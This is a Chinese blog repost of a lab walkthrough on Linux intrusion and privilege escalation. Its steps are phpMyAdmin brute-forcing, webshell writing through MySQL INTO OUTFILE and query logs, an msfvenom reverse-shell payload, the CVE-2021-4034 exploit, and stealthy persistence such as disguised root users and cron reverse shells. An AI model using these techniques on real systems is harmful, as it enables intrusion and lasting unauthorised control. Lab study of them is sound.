RM新时代网站-首页

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

初涉內(nèi)網(wǎng)提權(quán)方面詳解

馬哥Linux運(yùn)維 ? 來源:馬哥Linux運(yùn)維 ? 2023-05-22 09:56 ? 次閱讀

口水話

前段時(shí)間打了兩個(gè)靶場 由于內(nèi)網(wǎng)接觸的不多 這里在結(jié)束之后惡補(bǔ)了一下相關(guān)方面的知識(shí),對于初涉內(nèi)網(wǎng)的小白來說,可以作為一個(gè)較好的參考。由于本文主要介紹提權(quán)方面,所以代碼審計(jì)部分就略過,希望大家看了會(huì)有所收獲

靶場環(huán)境

搭建用的系統(tǒng):ubuntu 16.04    內(nèi)核4.15.0
web環(huán)境   php+mysql+thinkphp

流程

首先開啟靶場 在攻擊機(jī)正常訪問靶場地址

這里提一下  因?yàn)橐话氵@種老版本的thinkphp都是二開的  所以那些Nday很少能夠成功復(fù)現(xiàn)
而且這就是一個(gè)html靜態(tài)頁面  所以看完后面的小伙伴不要奇怪為什么不對thinkphp做Nday測試
但是這里有彩蛋

2cac91da-f814-11ed-90ce-dac502259ad0.png

webshell上傳過程

先來一波信息收集

實(shí)際情況肯定是要對該站點(diǎn)的子域名 cms 其他ip等等做收集
由于這里是靶場操作  這里就簡單進(jìn)行一個(gè)目錄掃描

2cfdb0e2-f814-11ed-90ce-dac502259ad0.png

通過目錄掃描可以得出  存在phpmyadmin管理界面的登錄界面  這種后臺(tái)嘛  直接bp爆破

BP爆破后臺(tái)登錄口令

沒啥說的啦  開BP代理直接跑

2d1a4b1c-f814-11ed-90ce-dac502259ad0.png

成功進(jìn)入phpmyadmin管理頁面 

ps:這里提一下 當(dāng)成功進(jìn)入管理頁面 需要去做什么呢?

查看secure_file_priv是否為NULL 或者為指定路徑
(當(dāng)為NULL的時(shí)候 說明沒有讀寫的權(quán)限 也就是你可能沒法通過into outfile的方式來寫入webshell文件 )
查看mysql的版本  路徑等

查看mysql的相關(guān)信息

2d515012-f814-11ed-90ce-dac502259ad0.png

secure_file_priv信息

2d715ce0-f814-11ed-90ce-dac502259ad0.png

之前提到的  當(dāng)secure_file_priv為NULL或者指定路徑是 是對其他目錄沒有讀寫權(quán)限的 
那么這里為空  也就是說 可以對任意目錄寫入文件(前提是這個(gè)目錄的所用者對其他目錄有讀寫權(quán)限)

mysql寫webshell拓展

幾個(gè)必要的前提條件
1.secure_file_priv不為NULL或者指定路徑
2.phpmyadmin所在目錄的擁有者對其他目錄有讀寫權(quán)限
3.全局gpc關(guān)閉  (mysql-5.3.29以上默認(rèn)關(guān)閉)
4.root權(quán)限(這里指的是登錄數(shù)據(jù)庫的用戶)
5.知道具體路徑(通過信息收集獲取,上文有提到靜態(tài)頁面存在菜單 這里可以回去看看)

into outfile()方式:
查詢執(zhí)行語句SELECT '' into OUTFILE '/home/wwwroot/default/ruchong.php' 
該語句的作用就是寫入一句話到網(wǎng)站根目錄下  詳情自己百度


日志方式
日志方式的寫入有兩種  全局日志以及慢日志 不過具體用法差不多
實(shí)現(xiàn)的原理是 當(dāng)你開啟日志記錄是 你所查詢的語句都會(huì)全部被記錄在指定的一個(gè)文件中
那假如你指定的是一個(gè)php文件并且你查詢的語句為一句話木馬呢?

全局日志:
首先查詢是否開啟了全局日志記錄
show variables like '%general%';   查看是否開啟

set global general_log = on;     #未開啟就手動(dòng)開啟general log 模式

set global general_log_file = 'web可訪問目錄' #設(shè)置日志目錄為shell地址

SELECT ''   #執(zhí)行查詢 即寫入到日志文件 

慢日志:
#查詢慢日志狀態(tài)
show variables like '%slow_query_log%'; 

#查詢mysql系統(tǒng)時(shí)間 
show global variables like '%long_query_time%';

#根據(jù)時(shí)間  設(shè)置超時(shí)

select '' or sleep(11);   設(shè)置查詢時(shí)間為11s

mysql寫入webshell

這里通過into outfile的方式寫入  日志記錄也可以

2d8b9178-f814-11ed-90ce-dac502259ad0.png

切換到靶機(jī)查看是否生成了該文件

2daa2642-f814-11ed-90ce-dac502259ad0.png

小技巧ps:
最好是先生成一個(gè)php探針頁面 為什么呢?
因?yàn)樘结橅撁婵梢栽敿?xì)的看到當(dāng)前的web環(huán)境的一些相關(guān)配置
(禁用函數(shù)情況、是否開啟php日志、session和php日志目錄等等)

2dcdeaf0-f814-11ed-90ce-dac502259ad0.png

連接webshell

這里先進(jìn)行一些相關(guān)的拓展

在不存在函數(shù)禁用的情況下:一般使用菜刀等就可以了 后續(xù)上傳大馬等等
存在函數(shù)禁用的情況:優(yōu)先考慮使用蟻劍 (可以使用disable_function繞過腳本)

2e1b2a4a-f814-11ed-90ce-dac502259ad0.png

打開虛擬終端  測試命令

2e456f30-f814-11ed-90ce-dac502259ad0.png

這里為什么會(huì)無法查詢呢?

因?yàn)檫@是一個(gè)虛擬終端  本質(zhì)是通過命令執(zhí)行來調(diào)用主機(jī)的終端來執(zhí)行命令 從而回顯數(shù)據(jù)
但是由于相關(guān)函數(shù)被禁用 所以很多命令都無法執(zhí)行 也就是說 這個(gè)虛擬終端等于廢掉
那么 這個(gè)時(shí)候蟻劍的插件就派上用場了  可以通過繞過來執(zhí)行少數(shù)的一些命令 從而給我們提供更多的操作空間
擴(kuò)大我們的攻擊范圍  ps:蟻劍的插件需要掛ti子來下載 有興趣的自己百度

2e6c75d0-f814-11ed-90ce-dac502259ad0.png

連接webshell后需要做什么

那肯定是上傳webshell 通過反彈來拓展攻擊面呀?。?但是前面提到了 插件繞過也只是能夠使用少數(shù)命令 本質(zhì)還是虛擬終端 所以很多都無法調(diào)用 
這個(gè)時(shí)候 就需要反彈一個(gè)shell來進(jìn)行更多的操作 所以 懂得都懂叭

提權(quán)過程

內(nèi)核提權(quán)

msfconsole登場

說到反彈shell 那肯定是msf啦  可以聯(lián)動(dòng)cs/bp等 

ps:這里是同一網(wǎng)段的靶場環(huán)境 所以不需要vps來做中轉(zhuǎn)(真實(shí)環(huán)境是需要用到vps的  后面有空了再寫橫向穿越,端口轉(zhuǎn)發(fā)以及隧道等內(nèi)容)

生成牧馬(保命)

由于是linux系統(tǒng) 這里就生成相應(yīng)的牧馬啦
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.128 LPORT=6666 to  -f elf > ruchong.elf

方便理解我這里直接寫了接收反彈的ip以及端口

2e900112-f814-11ed-90ce-dac502259ad0.png

小技巧
不同虛擬機(jī)傳文件需要從當(dāng)前虛擬機(jī)復(fù)制到物理機(jī)再復(fù)制到執(zhí)行虛擬機(jī)
是不是很麻煩?
使用python開啟一個(gè)臨時(shí)共享當(dāng)前目錄 就可以直接下載啦
命令:python3 -m http.server

2f21423a-f814-11ed-90ce-dac502259ad0.png

2f3c767c-f814-11ed-90ce-dac502259ad0.png

執(zhí)行牧馬反彈shell啦

運(yùn)行之前 msf開啟對應(yīng)payload  ip以及端口的監(jiān)聽
payload  ip  端口  都要與生成的木馬使用的一致
最后的命令run或者exploit開啟監(jiān)聽啦

2f728a64-f814-11ed-90ce-dac502259ad0.png

蟻劍上傳該牧馬
chmod +777 牧馬     #給權(quán)限運(yùn)行啦
./牧馬          #運(yùn)行牧馬

2fa923c6-f814-11ed-90ce-dac502259ad0.png

msf成功收到反彈

2fcdd798-f814-11ed-90ce-dac502259ad0.png

內(nèi)核提權(quán)準(zhǔn)備工作

既然是內(nèi)核提權(quán)  當(dāng)然要知道內(nèi)核信息啦
使用命令uname -a查看當(dāng)前的系統(tǒng)版本以及內(nèi)核信息

2fe88674-f814-11ed-90ce-dac502259ad0.png

內(nèi)核腳本的選擇

知道了內(nèi)核版本后  有多種選擇內(nèi)核的方式  這里簡單的列舉幾個(gè)

利用某網(wǎng)站來收集可使用的內(nèi)核提權(quán)腳本

https://www.exploit-db.com/

3004c0c8-f814-11ed-90ce-dac502259ad0.png

利用kali自帶搜索相應(yīng)內(nèi)核提權(quán)腳本

搜索命令   searchsploit  版本號(hào)/內(nèi)核號(hào)
下載腳本   searchsploit -m  fath

306af4f6-f814-11ed-90ce-dac502259ad0.png

利用相關(guān)插件收集提權(quán)腳本

該腳本自行上github搜索

./linux-exploit-suggester.sh -k 4.15.0 
執(zhí)行腳本   -k 指定的內(nèi)核版本

30f4d748-f814-11ed-90ce-dac502259ad0.png

msf本地提權(quán)

run post/multi/recon/local_exploit_suggester

這個(gè)是自動(dòng)檢測可能成功的內(nèi)核提權(quán)腳本并且逐個(gè)嘗試
由于需要大概半個(gè)小時(shí) 所以就沒有操作  有興趣的可以自行嘗試

內(nèi)核提權(quán)!??!

前面說了那么多  終于到關(guān)鍵的一步了

先說說為什么提權(quán)要提權(quán):
1.某些命令需要高權(quán)限用戶才可執(zhí)行
2.低權(quán)限用戶對于大多數(shù)敏感目錄沒有讀取權(quán)限
3.無法dump密碼  不存在密碼噴灑

這里利用cve-2021-4034來進(jìn)行提權(quán) github可以搜索下載
使用蟻劍上傳  下面po一下改提權(quán)腳本 如何使用

314ee27e-f814-11ed-90ce-dac502259ad0.png

在msf執(zhí)行紅框命令

317430c4-f814-11ed-90ce-dac502259ad0.png

可以看到 成功提權(quán)到root權(quán)限 
root權(quán)限能干嘛 不用多說了吧
下面簡單說一下權(quán)限維持的幾個(gè)方式

權(quán)限維持

1.創(chuàng)建一個(gè)用戶 并且權(quán)限為root  用戶名可以偽造成系統(tǒng)用戶名 比如說mysqld等等
2.開啟ssh登錄 并且生成root的ssh認(rèn)證密鑰對  將其保存本地 后滲透直接使用ssh登錄
3.添加計(jì)劃任務(wù)  即周期性的使用root身份反彈shell
4.使用不死馬或者內(nèi)存馬
5.設(shè)置啟動(dòng)項(xiàng)

其他提權(quán)方式

后面有時(shí)間我會(huì)單獨(dú)寫提權(quán)方式、不同平臺(tái)提權(quán)、內(nèi)網(wǎng)橫向移動(dòng)所使用的端口轉(zhuǎn)發(fā)、sock隧道建立的文章
這里大概提一下linux系統(tǒng)提權(quán)的其他方式

1.suid提權(quán)    #使用find查找root用戶的suid文件  通過運(yùn)行該類文件獲取root權(quán)限
2.sudo提權(quán)    #個(gè)人覺得有點(diǎn)雞肋 畢竟一般來說 webshell登錄的用戶權(quán)限是無法操作sudoers文件
3.計(jì)劃任務(wù)提權(quán)  #查看計(jì)劃任務(wù)中有root權(quán)限的腳本  通過運(yùn)行該腳本獲取root權(quán)限
4.mysql提權(quán)   #本次靶場是可以使用mysql提權(quán)的  百度cve-2016-6663了解

總結(jié)

對于內(nèi)核提權(quán)就寫到這啦  整體看下來應(yīng)該都會(huì)有一個(gè)比較清楚的認(rèn)知吧 不懂的話多看幾遍 相對來說是寫的比較詳細(xì)的了。

關(guān)于內(nèi)網(wǎng)還有很多需要學(xué)習(xí)的知識(shí) 像提權(quán)后的權(quán)限維持、橫向移動(dòng)、后滲透、痕跡清理、不同平臺(tái)的不同方式提權(quán)、以及進(jìn)階的域滲透。后期有空了會(huì)更新有關(guān)內(nèi)容的文章。學(xué)海無涯,希望大家每天都能學(xué)到新知識(shí)提升自己,學(xué)到的東西可不要做非法的事哈?。。?!
審核編輯:彭靜
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報(bào)投訴
  • 代碼
    +關(guān)注

    關(guān)注

    30

    文章

    4779

    瀏覽量

    68521
  • 內(nèi)網(wǎng)
    +關(guān)注

    關(guān)注

    0

    文章

    37

    瀏覽量

    8981
  • phpMyAdmin
    +關(guān)注

    關(guān)注

    0

    文章

    5

    瀏覽量

    5887

原文標(biāo)題:初涉內(nèi)網(wǎng),提權(quán)那些事(小白適用)

文章出處:【微信號(hào):magedu-Linux,微信公眾號(hào):馬哥Linux運(yùn)維】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    如何使用環(huán)境變量進(jìn)行Linux權(quán)的方法詳細(xì)資料概述

    在這篇文章中,我將會(huì)為大家介紹一些使用環(huán)境變量進(jìn)行Linux權(quán)的方法,包括在CTF challenges中使用到一些的技術(shù)。話不多說,讓我們進(jìn)入正題!
    的頭像 發(fā)表于 07-05 09:50 ?5274次閱讀
    如何使用環(huán)境變量進(jìn)行Linux<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>的方法詳細(xì)資料概述

    UCOS詳解

    UCOS詳解!對者來說還是不錯(cuò)的!
    發(fā)表于 08-24 16:27

    altium designer遇到了一個(gè)麻煩,大神幫幫忙啊,先謝過!

    如題,小弟EDA工具,這是我畫的第二塊板子,所以經(jīng)驗(yàn)不足。問題是這樣的,這個(gè)IC4558的原理圖和封裝都是我自己做的,原理圖在沒問題,編譯的時(shí)候也沒有什么錯(cuò)誤,但是生成PCB封裝他的八個(gè)引腳都沒有連線??!我糾結(jié)一整天都沒找出原因,進(jìn)度也就停在這了。。。大神幫幫忙啊??!
    發(fā)表于 01-18 00:28

    內(nèi)網(wǎng)穿透詳解-基于NATAPP&NatAssist測試

    本帖最后由 1406093611 于 2019-11-13 22:41 編輯 內(nèi)網(wǎng)穿透詳解-基于NATAPP&NatAssist TCP測試【前言】最近做一個(gè)4G模塊
    發(fā)表于 09-13 12:14

    香港云服務(wù)器寶塔windows面板權(quán)獲取系統(tǒng)管理員權(quán)限

    用往下看了,下面來說說寶塔windows面板權(quán)過程。測試系統(tǒng):windows 2008寶塔windows面板版本:3.1權(quán)方式:啟動(dòng)項(xiàng)如果有了解過滲透
    發(fā)表于 04-25 01:59

    搭建自己的IOT平臺(tái)---內(nèi)網(wǎng)穿透

    相信大部分小伙伴在搭建環(huán)境的時(shí)候都是用虛擬機(jī)來搭建的,如果想實(shí)現(xiàn)外網(wǎng)訪問內(nèi)網(wǎng)的話,還是比較麻煩的。在這里我就針對這個(gè)問題,寫一篇教程,教大家用最簡單的方式實(shí)現(xiàn)內(nèi)網(wǎng)穿透,能做到外網(wǎng)訪問內(nèi)網(wǎng),實(shí)現(xiàn)可視化
    發(fā)表于 12-09 23:14

    權(quán)限提升之Mysql權(quán)

    權(quán)限提升之Mysql權(quán)
    發(fā)表于 09-07 10:50 ?4次下載
    權(quán)限提升之Mysql<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>

    常見的權(quán)方法與運(yùn)維建議

    常見的權(quán)方法與運(yùn)維建議
    發(fā)表于 09-07 11:23 ?4次下載
    常見的<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>方法與運(yùn)維建議

    Webshell權(quán)登陸服務(wù)器

    Webshell權(quán)登陸服務(wù)器
    發(fā)表于 09-07 14:04 ?4次下載
    Webshell<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>登陸服務(wù)器

    Linux內(nèi)核權(quán)攻擊研究

    權(quán)攻擊是針對Linux系統(tǒng)的一種重要攻擊手段。根據(jù)權(quán)攻擊所利用的漏洞類型,一般可將其分為應(yīng)用層權(quán)
    發(fā)表于 11-24 11:46 ?0次下載
    Linux內(nèi)核<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>攻擊研究

    內(nèi)網(wǎng)滲透:獲取Windows內(nèi)Hash密碼的方法

    內(nèi)網(wǎng)滲透中,當(dāng)攻擊者獲取到內(nèi)網(wǎng)某臺(tái)機(jī)器的控制權(quán)后,會(huì)議被攻陷的主機(jī)為跳板,通過收集域內(nèi)憑證等各種方法,訪問域內(nèi)其他機(jī)器,進(jìn)一步擴(kuò)大資產(chǎn)范圍。
    的頭像 發(fā)表于 12-24 16:01 ?916次閱讀

    OLED面板企業(yè)維信諾控制權(quán)或易主

    OLED顯示大廠維信諾今日宣布公司股票停牌,事公司控制權(quán)或?qū)⒁字鳌?/div>
    的頭像 發(fā)表于 03-02 14:13 ?2141次閱讀

    多種繞過WAF方式獲取穩(wěn)定shell、內(nèi)部信息收集和權(quán)

    本項(xiàng)目中包含信息收集、信息收集、識(shí)別WAF、多種繞過WAF方式、獲取穩(wěn)定shell、內(nèi)部信息收集和權(quán),最終拿到flag.txt。其中包含一些小技巧以及知識(shí),都會(huì)在文章中展現(xiàn)出來。
    的頭像 發(fā)表于 07-07 10:58 ?3364次閱讀

    一款數(shù)據(jù)庫自動(dòng)化權(quán)工具

    一款用Go語言編寫的數(shù)據(jù)庫自動(dòng)化權(quán)工具,支持Mysql、MSSQL、Postgresql、Oracle、Redis數(shù)據(jù)庫權(quán)、命令執(zhí)行、爆破以及ssh連接等等功能。
    的頭像 發(fā)表于 07-19 14:57 ?697次閱讀
    一款數(shù)據(jù)庫自動(dòng)化<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>工具

    內(nèi)網(wǎng)穿透frp原理簡述

    FRP的優(yōu)點(diǎn): 它可以隱藏內(nèi)網(wǎng)中的服務(wù)器, 避免因直接暴露內(nèi)網(wǎng)服務(wù)器導(dǎo)致的安全問題。此外, FRP還支持動(dòng)態(tài)端口映射, 可以方便地實(shí)現(xiàn)內(nèi)網(wǎng)的服務(wù)器負(fù)載均衡
    的頭像 發(fā)表于 11-13 14:38 ?5220次閱讀
    <b class='flag-5'>內(nèi)網(wǎng)</b>穿透frp原理簡述
    RM新时代网站-首页